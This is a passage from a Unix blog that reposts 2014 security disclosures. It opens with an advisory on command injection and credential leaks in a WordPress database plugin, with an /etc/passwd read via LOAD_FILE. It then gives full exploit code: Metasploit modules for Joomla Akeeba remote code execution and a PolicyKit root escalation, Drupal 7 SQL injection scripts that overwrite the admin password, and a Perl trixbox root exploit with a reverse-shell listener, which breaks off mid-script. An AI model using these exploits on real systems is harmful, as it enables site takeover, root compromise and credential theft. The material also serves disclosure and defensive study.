MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

22Oct/140

WordPress Database Manager 2.7.1 Command Injection / Credential Leak

Title: Vulnerabilities in WordPress Database Manager v2.7.1
Author: Larry W. Cashdollar, @_larry0
Date: 10/13/2014
Download: https://wordpress.org/plugins/wp-dbmanager/
Downloads: 1,171,358
Vendor: Lester Chan, https://profiles.wordpress.org/gamerz/
Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2.
Full Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-dbmanager-2.7.1/index.html
CVE: 2014-8334,2014-8335
OSVDBID: 113508,113507,113509
 
Description: "Allows you to optimize database, repair database, backup database, restore database, delete backup database , drop/empty tables and run selected queries. Supports automatic scheduling of backing up, optimizing and repairing of database."
 
Vulnerability: Plugin suffers from command injection, exposes MySQL database credentials to the process table and allows the user to download system files via the ‘Run SQL Query’ feature. User authentication with current_user_can('manage_database')) privileges are required.  The full advisory has screen shots for illustration. 
 
PoC
 
Command Injection
 
The command that is sent through passthru() is the following:
 
 
/usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" 
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db\';rce;\'/1413225588_-_wordpress.sql
 
 
rce is just a homebrew .c binary I wrote for testing command injections it creates a file
in /tmp with some stats on who executed it.
 
 
# cat /tmp/RCE_JChl9c 
ARGGHHH I've been executed! my pid is :16169 Parent id 16168 
Name:        sh
State:        S (sleeping)
Tgid:        16168
Pid:        16168
PPid:        15925
TracerPid:        0
Uid:        33        33        33        33
Gid:        33        33        33        33
FDSize:        32
Groups:        33 
 
 
 
 
In the following lines commands can be injected into the variables being used to build
the command by using ;command;
 
 
$backup['filepath'] 
$backup['mysqldumppath']
 
 
I use $backup[‘filepath’] or “Path To Backup:”  for my PoC.
 
 
/usr/share/wordpress/wp-content/backup-db;rce;
 
 
Saving and then Running a backup executes /usr/bin/rce, the command that is sent through passthru() is the following:
 
 
/usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" 
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db;rce;/1413225588_-_wordpress.sql
 
 
rce is just a homebrew .c binary I wrote for testing command injections, it creates a file
in /tmp with some stats on who executed it.  
 
 
# cat /tmp/RCE_JChl9c 
ARGGHHH I've been executed! my pid is :16169 Parent id 16168 
Name:        sh
State:        S (sleeping)
Tgid:        16168
Pid:        16168
PPid:        15925
TracerPid:        0
Uid:        33        33        33        33
Gid:        33        33        33        33
FDSize:        32
Groups:        33 
 
 
Mysql Credentials Leaked to Process Table
 
 
Also by running a simple script:
PoC:
$ while (true); do  echo -n `ps ax | grep m[y]sqldump`; done
 
 
6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql 6328 ? R 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql 6328 ? S 0:00 /usr/bin/mysqldump --force --host=localhost --user=root --password=x xxxxxx --default-character-set=utf8 --add-drop-table --skip-lock-tables wordpress6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql 6328 ? S 0:00 /usr/bin/mysqldump --force --host=localhost --user=root --password=x xxxxxx --default-character-set=utf8 --add-drop-table --skip-lock-tables wordpress
 
 
A malicious local user can harvest credentials for the mysql database off the process table.
 
 
The trouble is the code doesn’t properly sanitize user input and is being passed directly to passthru or system depending on which OS you’re using.
 
 
   In wp-dbmanager.php:
      86                 $backup['command'] = '';
   87                 $brace = (substr(PHP_OS, 0, 3) == 'WIN') ? '"' : '';
   88                 if(intval($backup_options['backup_gzip']) == 1) {
   89                         $backup['filename'] = $backup['date'].'_-_'.DB_NAME.'.sql.gz';
   90                         $backup['filepath'] = $backup['path'].'/'.$backup['filename'];
   91                         $backup['command'] = $brace.$backup['mysqldumppath'].$brace.' --force --host="'.$backup['host'].'" --user="'.DB_USER.'" --password="'.$backup['password'].'"'.$backup['port'].$backup['sock'].' --add-drop-table --skip-lock-tables '.DB_NAME.' | gzip > '.$brace.$backup['filepath'].$brace;
   92                 } else {
   93                         $backup['filename'] = $backup['date'].'_-_'.DB_NAME.'.sql';
   94                         $backup['filepath'] = $backup['path'].'/'.$backup['filename'];
   95                         $backup['command'] = $brace.$backup['mysqldumppath'].$brace.' --force --host="'.$backup['host'].'" --user="'.DB_USER.'" --password="'.$backup['password'].'"'.$backup['port'].$backup['sock'].' --add-drop-table --skip-lock-tables '.DB_NAME.' > '.$brace.$backup['filepath'].$brace;
   96                 }
   97                 execute_backup($backup['command']);
 
 
 
  211 ### Executes OS-Dependent mysqldump Command (By: Vlad Sharanhovich)
  212 function execute_backup($command) {
  213         $backup_options = get_option('dbmanager_options');
  214         check_backup_files();
  215         if(substr(PHP_OS, 0, 3) == 'WIN') {
  216                 $writable_dir = $backup_options['path'];
  217                 $tmpnam = $writable_dir.'/wp-dbmanager.bat';
  218                 $fp = fopen($tmpnam, 'w');
  219                 fwrite($fp, $command);
  220                 fclose($fp);
  221                 system($tmpnam.' > NUL', $error);
  222                 unlink($tmpnam);
  223         } else {
  224                 passthru($command, $error);
  225         }
  226         return $error;
  227 }
 
 
In database-manage.php: 
      46                                 if(stristr($database_file, '.gz')) {
   47                                         $backup['command'] = 'gunzip < '.$brace.$backup['path'].'/'.$database_file.$brace.' | '.$brace.$backup['mysqlpath'].$brace.' --host="'.$backup['host'].'" --user="'.DB_USER.'" --password="'.$backup['password'].'"'.$backup['port'].$backup['sock'].$backup['charset'].' '.DB_NAME;
   48                                 } else {
   49                                         $backup['command'] = $brace.$backup['mysqlpath'].$brace.' --host="'.$backup['host'].'" --user="'.DB_USER.'" --password="'.$backup['password'].'"'.$backup['port'].$backup['sock'].$backup['charset'].' '.DB_NAME.' < '.$brace.$backup['path'].'/'.$database_file.$brace;
   50                                 }
   51                                 passthru($backup['command'], $error);
 
 
 
 
File Downloads
In the ‘Sql Run Query’ Panel only a few queries are allowed (Use Only INSERT, UPDATE, REPLACE, DELETE, CREATE and ALTER statements.) but these are suffiecient to download sensitive system files:
CREATE TABLE password (passwords varchar(8096));
 
 
INSERT into password (passwords) VALUES(LOAD_FILE(‘/etc/passwd’));
 
 
Then run a database backup, and download the backup file or send via email. 
 
 
From 1413409573_-_wordpress.sql:
 
 
INSERT INTO `password` VALUES ('root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/spool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:proxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh\nbackup:x:34:34:backup:/var/backups:/bin/sh\nlist:x:38:38:Mailing List Manager:/var/list:/bin/sh\nirc:x:39:39:ircd:/var/run/ircd:/bin/sh\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh\nnobody:x:65534:65534:nobody:/nonexistent:/bin/sh\nlibuuid:x:100:101::/var/lib/libuuid:/bin/sh\nDebian-exim:x:101:104::/var/spool/exim4:/bin/false\nstatd:x:102:65534::/var/lib/nfs:/bin/false\nsshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin\npostgres:x:104:108:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash\nlarry:x:1000:1000:larry,,,:/home/larry:/bin/bash\nmysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false\nmessagebus:x:106:110::/var/run/dbus:/bin/false\n');
/*!40000 ALTER TABLE `password` ENABLE KEYS */;

(27)

21Oct/140

Joomla Akeeba Kickstart Unserialize Remote Code Execution

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/zip'
require 'json'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Joomla Akeeba Kickstart Unserialize Remote Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier
        3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba
        component, which is responsible for Joomla! updates. Nevertheless it is worth to note
        that this vulnerability is only exploitable during the update of the Joomla! CMS.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Johannes Dahse',               # Vulnerability discovery
          'us3r777 <us3r777[at]n0b0.so>'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2014-7228' ],
          [ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'],
          [ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'],
          [ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'],
        ],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]
        ],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Privileged'     => false,
      'DisclosureDate' => "Sep 29 2014",
      'DefaultTarget'  => 0))
 
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
        OptInt.new('HTTPDELAY',    [false, 'Seconds to wait before terminating web server', 5])
      ], self.class)
  end
 
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php')
    )
 
    if res && res.code == 200
      return Exploit::CheckCode::Detected
    end
 
    Exploit::CheckCode::Safe
  end
 
  def primer
    srv_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip"
 
    php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"' + "\x00" + 'AKFactory' + "\x00" + 'varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";}}'
    php_filename = rand_text_alpha(8 + rand(8)) + '.php'
 
    # Create the zip archive
    print_status("Creating archive with file #{php_filename}")
    zip_file = Rex::Zip::Archive.new
    zip_file.add_file(php_filename, payload.encoded)
    @zip = zip_file.pack
 
    # First step: call restore to run _prepare() and get an initialized AKFactory
    print_status("#{peer} - Sending PHP serialized object...")
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
      'vars_get'  => {
        'task'    => 'stepRestore',
        'factory' => Rex::Text.encode_base64(php_serialized_akfactory)
      }
    })
 
    unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
      print_status("#{res.code}\n#{res.body}")
      fail_with(Failure::Unknown, "#{peer} - Unexpected response")
    end
 
    # Second step: modify the currentPartNumber within the returned serialized AKFactory
    json = /###(.*)###/.match(res.body)[1]
    begin
      b64encoded_prepared_factory = JSON.parse(json)['factory']
    rescue JSON::ParserError
      fail_with(Failure::Unknown, "#{peer} - Unexpected response, cannot parse JSON")
    end
 
    prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)
    modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1')
 
    print_status("#{peer} - Sending initialized and modified AKFactory...")
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
      'vars_get'  => {
        'task'    => 'stepRestore',
        'factory' => Rex::Text.encode_base64(modified_factory)
      }
    })
 
    unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
      fail_with(Failure::Unknown, "#{peer} - Unexpected response")
    end
 
    register_files_for_cleanup(php_filename)
 
    print_status("#{peer} - Executing payload...")
    send_request_cgi({
      'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)
    }, 2)
 
  end
 
  def exploit
    begin
      Timeout.timeout(datastore['HTTPDELAY']) { super }
    rescue Timeout::Error
      # When the server stops due to our timeout, this is raised
    end
  end
 
  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    if @zip && request.uri =~ /\.zip$/
      print_status("Sending the ZIP archive...")
      send_response(cli, @zip, { 'Content-Type' => 'application/zip' })
      return
    end
 
    print_status("Sending not found...")
    send_not_found(cli)
  end
 
end

(57)

19Oct/140

Drupal Core 7.32 SQL Injection (python Version)

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
    print "host username password"
    print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
            +hash[:55] \
            +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

(75)

19Oct/140

Drupal Core 7.32 SQL Injection (PHP Version)

<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
 
$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
 
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
 
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>

(49)

18Oct/140

Linux PolicyKit Race Condition Privilege Escalation

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class Metasploit4 < Msf::Exploit::Local
  Rank = GreatRanking
 
  include Msf::Exploit::EXE
  include Msf::Post::File
 
  include Msf::Exploit::Local::Linux
 
  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Linux PolicyKit Race Condition Privilege Escalation',
      'Description'   => %q(
        A race condition flaw was found in the PolicyKit pkexec utility and polkitd
        daemon. A local user could use this flaw to appear as a privileged user to
        pkexec, allowing them to execute arbitrary commands as root by running
        those commands with pkexec.
 
        Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu
        libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1
        (10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
      ),
      'License'       => MSF_LICENSE,
      'Author'        =>
      [
        'xi4oyu',                           # exploit
        '0a29406d9794e4f9b30b3c5d6702c708'  # metasploit module
      ],
      'Platform'       => [ 'linux'],
      'Arch'           => [ ARCH_X86, ARCH_X86_64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'       =>
      [
        [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
        [ 'Linux x64',       { 'Arch' => ARCH_X86_64 } ]
      ],
      'DefaultTarget' => 0,
      'References'    =>
      [
        [ 'CVE', '2011-1485' ],
        [ 'EDB', '17942' ],
        [ 'OSVDB', '72261' ]
      ],
      'DisclosureDate' => "Apr 01 2011"
    ))
    register_options([
      OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]),
      OptInt.new("Count", [true, "Number of attempts to win the race condition", 500 ]),
      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
      OptBool.new("DEBUG", [ true, "Make the exploit executable be verbose about what it's doing", false ])
    ])
  end
 
  def executable_path
    @executable_path ||= datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
    @executable_path
  end
 
  def exploit
    main = %q^
/*
* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
* Author: xi4oyu
* Tested on: rhel 6
* CVE : 2011-1485
* Linux pkexec exploit by xi4oyu , thx dm@0x557.org * Have fun~
* U can reach us  @ http://www.wooyun.org :)
* 0a2940: some changes
*/
/*
#include <stdio.h>
#include <limits.h>
#include <time.h>
#include <unistd.h>
#include <termios.h>
#include <sys/stat.h>
#include <errno.h>
#include <poll.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
*/
 
#define dprintf
 
#define NULL ((void*)0)
 
#define MAP_PRIVATE   0x02
#define MAP_FIXED     0x10
#define MAP_ANONYMOUS 0x20
#define MAP_ANON MAP_ANONYMOUS
#define MAP_FAILED ((void *)-1)
 
#define PROT_READ  0x1
#define PROT_WRITE 0x2
#define PROT_EXEC  0x4
 
#define O_CREAT 64
#define O_RDWR 2
 
#define POLLRDNORM      0x0040
 
typedef int __pid_t;
typedef int __time_t;
typedef
struct {
        long __val[2];
} __quad_t;
typedef __quad_t __dev_t;
typedef long __ino_t;
typedef unsigned long __mode_t;
typedef long __nlink_t;
typedef unsigned int __uid_t;
typedef unsigned int __gid_t;
typedef long long __off_t;
typedef long __blksize_t;
typedef long long __blkcnt_t;
struct _stat_buff {
    __dev_t st_dev;                     /* Device.  */
    unsigned short int __pad1;
    __ino_t st_ino;                     /* File serial number.  */
    __mode_t st_mode;                   /* File mode.  */
    __nlink_t st_nlink;                 /* Link count.  */
    __uid_t st_uid;                     /* User ID of the file's owner. */
    __gid_t st_gid;                     /* Group ID of the file's group.*/
    __dev_t st_rdev;                    /* Device number, if device.  */
    unsigned short int __pad2;
    __off_t st_size;                    /* Size of file, in bytes.  */
    __blksize_t st_blksize;             /* Optimal block size for I/O.  */
    __blkcnt_t st_blocks;               /* Number 512-byte blocks allocated. */
    __time_t st_atime;                  /* Time of last access.  */
    unsigned long int st_atimensec;     /* Nscecs of last access.  */
    __time_t st_mtime;                  /* Time of last modification.  */
    unsigned long int st_mtimensec;     /* Nsecs of last modification.  */
    __time_t st_ctime;                  /* Time of last status change.  */
    unsigned long int st_ctimensec;     /* Nsecs of last status change.  */
    unsigned long int __unused4;
    unsigned long int __unused5;
};
 
struct _pollfd {
    int   fd;         /* file descriptor */
    short events;     /* requested events */
    short revents;    /* returned events */
};
typedef unsigned long size_t;
extern void *mmap(void *__addr, size_t __len, int __prot, int __flags, int __fd, __off_t __offset);
extern int mprotect(void *__addr, size_t __len, int __prot);
extern void exit(int __status);
extern int printf(const char *__format, ...);
extern __pid_t fork(void);
extern __time_t time(__time_t *t);
extern __pid_t getpid(void);
extern __uid_t geteuid(void);
extern void srand(unsigned int seed);
extern int snprintf(char *str, size_t size, const char *format, ...);
extern int pipe(int pipefd[2]);
extern int close(int fd);
extern void write(int fd, const void *buf, size_t count);
extern int dup2(int oldfd, int newfd);
extern void perror(const char *__s);
extern void read(int fd, void *buf, size_t count);
extern int execve(const char *filename, char *const argv[], char *const envp);
extern int usleep(int usec);
extern void *memset(void *s, int c, size_t n);
extern void *memcpy(void * dst, const void *src, size_t n);
extern int poll(struct _pollfd *fds, unsigned int nfds, int timeout);
extern char *strstr(const char *haystack, const char *needle);
extern int rand(void);
extern int unlink(const char *__name);
 
int main(int argc,char *argv[], char ** envp)
{
 
    __time_t tim_seed1;
    __pid_t pid_seed2;
    int result;
    struct _stat_buff stat_buff;
 
    char * chfn_path = "/usr/bin/chfn";
    char * cmd_path = "";
 
    char * pkexec_argv[] = {
        "/usr/bin/pkexec",
        "/bin/sh",
        "-c",
        cmd_path,
        NULL
    };
    int pipe1[2];
    int pipe2[2];
    int pipe3[2];
    __pid_t pid,pid2 ;
    char * chfn_argv[] = {
        "/usr/bin/chfn",
        NULL
    };
 
    char buff[8];
    char read_buff[4096];
    char real_path[512];
 
    int count = 0;
    int flag = 0;
    unsigned int usleep1 = 0;
    unsigned int usleep2 = 0;
 
    tim_seed1 = time(NULL);
    pid_seed2 = getpid();
    srand(tim_seed1+pid_seed2);
 
    if(!geteuid()){
 
      unlink(cmd_path);
 
      SHELLCODE
 
      int shellcode_size = 0;
      int i;
      unsigned long (*func)();
      func = mmap(NULL, 0x1000,
        PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_PRIVATE | MAP_ANONYMOUS,
        0, 0
      );
      mprotect(func, 4096, PROT_READ|PROT_WRITE|PROT_EXEC);
      dprintf("Copying %d bytes of shellcode\n", shellcode_size);
      //for (i = 0; i < shellcode_size; i++) {
        //(char)func[i] = (char)shellcode[i];
         memcpy(func,shellcode,shellcode_size);
      //}
      dprintf("Forking before calling shellcode: 0x%p\n", func);
      if (fork()) {
        exit(0);
      }
      func();
    }
 
    if(pipe(pipe1)){
        perror("pipe");
        exit(-2);
    }
 
    for(count = COUNT; count && !flag; count--){
        dprintf("count %d usleep1 %d usleep2 %d\n",count,usleep1,usleep2);
        pid = fork();
        if( !pid ){
            // Parent
            if( !pipe(pipe2)){
                if(!pipe(pipe3)){
                    pid2 = fork();
                    if(!pid2){
                        // Parent 2
                        close(1);
                        close(2);
                        close(pipe1[0]);
                        dup2(pipe1[1],2);
                        dup2(pipe1[1],1);
                        close(pipe1[1]);
                        close(pipe2[0]);
                        close(pipe3[1]);
                        write(pipe2[1],"\xFF",1);
                        read(pipe3[0],&buff,1);
                        execve(pkexec_argv[0],pkexec_argv,envp);
                        perror("execve pkexec");
                        exit(-3);
                    }
                    close(0);
                    close(1);
                    close(2);
                    close(pipe2[1]);
                    close(pipe3[0]);
                    read(pipe2[0],&buff,1);
                    write(pipe3[1],"\xFF",1);
                    usleep(usleep1+usleep2);
                    execve(chfn_argv[0],chfn_argv,envp);
                    perror("execve setuid");
                    exit(1);
                }
            }
            perror("pipe3");
            exit(1);
        }
 
        //Note: This is child, no pipe3 we use poll to monitor pipe1[0]
        memset(pipe3,0,8);
 
        struct _pollfd * pollfd = (struct pollfd *)(&pipe3);
        pollfd->fd = pipe1[0];
        pollfd->events =  POLLRDNORM;
 
        if(poll(pollfd,1,1000) < 0){
            perror("poll");
            exit(1);
        }
 
        if(pollfd->revents & POLLRDNORM ){
            memset(read_buff,0,4096);
            read(pipe1[0],read_buff,4095);
            if( strstr(read_buff,"does not match")){
                usleep1 += 100;
                usleep2 = rand() % 1000;
            }else{
                if(usleep1 > 0){
                  usleep1 -= 100;
                }
            }
        }
    }
    result = 0;
    unlink(cmd_path);
    return result;
}
 
^
    main.gsub!(/SHELLCODE/, Rex::Text.to_c(payload.encoded, 64, "shellcode"))
    main.gsub!(/shellcode_size = 0/, "shellcode_size = #{payload.encoded.length}")
    main.gsub!(/cmd_path = ""/, "cmd_path = \"#{executable_path}\"")
    main.gsub!(/COUNT/, datastore["Count"].to_s)
    main.gsub!(/#define dprintf/, "#define dprintf printf") if datastore['DEBUG']
 
    cpu = nil
    if target['Arch'] == ARCH_X86
      cpu = Metasm::Ia32.new
    elsif target['Arch'] == ARCH_X86_64
      cpu = Metasm::X86_64.new
    end
 
    begin
      elf = Metasm::ELF.compile_c(cpu, main).encode_string
    rescue
      print_error "Metasm Encoding failed: #{$ERROR_INFO}"
      elog "Metasm Encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
      elog "Call stack:\n#{$ERROR_INFO.backtrace.join("\n")}"
      return
    end
 
    print_status "Writing exploit executable to #{executable_path} (#{elf.length} bytes)"
    rm_f executable_path
    write_file(executable_path, elf)
    output = cmd_exec("chmod +x #{executable_path}; #{executable_path}")
    output.each_line { |line| print_debug line.chomp }
 
    stime = Time.now.to_f
    print_status "Starting the payload handler..."
    until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
      Rex.sleep(1)
    end
  end
end

(79)

17Oct/140

Fonality Trixbox CE 2.8.0.4 Command Execution

#!/usr/bin/perl
#
# Title: Fonality trixbox CE remote root exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered & Coded: 2 June 2014
# Published: 17 October 2014
# MorXploit Research
# http://www.MorXploit.com
# Software: trixbox CE
# Version: trixbox-2.8.0.4.iso
# Vendor url: http://www.fonality.com/
# Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/
# Vulnerable file: maint/modules/home/index.php
#
# Description:
# maint/modules/home/index.php suffers from a command execution vulnerability, allowing an authenticated user to inject commands as the
# asterisk user which then can be leverged to root privilege through sudo.
#
# from /etc/sudoers:
## asterisk ALL = NOPASSWD: /bin/bash
# 
# Vulnerable code:  
# Line 68: $tbLang = $_GET['lang'];
# Line 339: shell_exec $phpOutput = shell_exec('php -q libs/status.php ' . $tbLang); 
#
# Note:
# We did a full audit of Fonality trixbox CE 2.8.0.4 and we found several similar vulnerabilities (File disclosure, command/code execution etc).
# We didn't think it was necessary to cover all the findings since support for the CE edition has been discontinued
# but anyone who thinks about installing this should think twice.
#
# Download:
# http://www.morxploit.com/morxploits/morxtrix.pl
#
# Demo:
# perl trixbox.pl http://10.0.0.16 10.0.0.2 1111
#
# ===================================================
# --- Fonality trixbox remote root exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] MorXploiting http://10.0.0.16/maint/modules/home/index.php
# [+] Sent payload! Waiting for connect back root shell ...
# [+] Et voila you are in!
#
# Linux trixbox1.localdomain 2.6.18-164.11.1.el5 #1 SMP Wed Jan 20 07:39:04 EST 2010 i686 i686 i386 GNU/Linux
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
 
use LWP::UserAgent;
use MIME::Base64;
use IO::Socket;
use strict;
 
sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Fonality trixbox CE remote root exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}
 
if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) {
banner();
print "perl $0 <target> <connectbackIP> <connectbackport>\n";
print "perl $0 http://10.0.0.16 10.0.0.2 31337\n";
exit;
}
 
my $host = $ARGV[0];
my $vuln = "maint/modules/home/index.php";
my $cbhost = $ARGV[1];
my $cbport = $ARGV[2];
my $defuser = "maint"; # Default maint user
my $defpass = "password"; # Default maint pass
my $string = "$defuser:$defpass";
my $encoded = encode_base64($string);
$| = 1;
$SIG{CHLD} = 'IGNORE';
 
my $l_sock = IO::Socket::INET->new(
Proto => "tcp",
LocalPort => "$cbport",
Listen => 1,
LocalAddr => "0.0.0.0",
Reuse => 1,
) or die "[-] Could not listen on $cbport: $!\n";
 
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
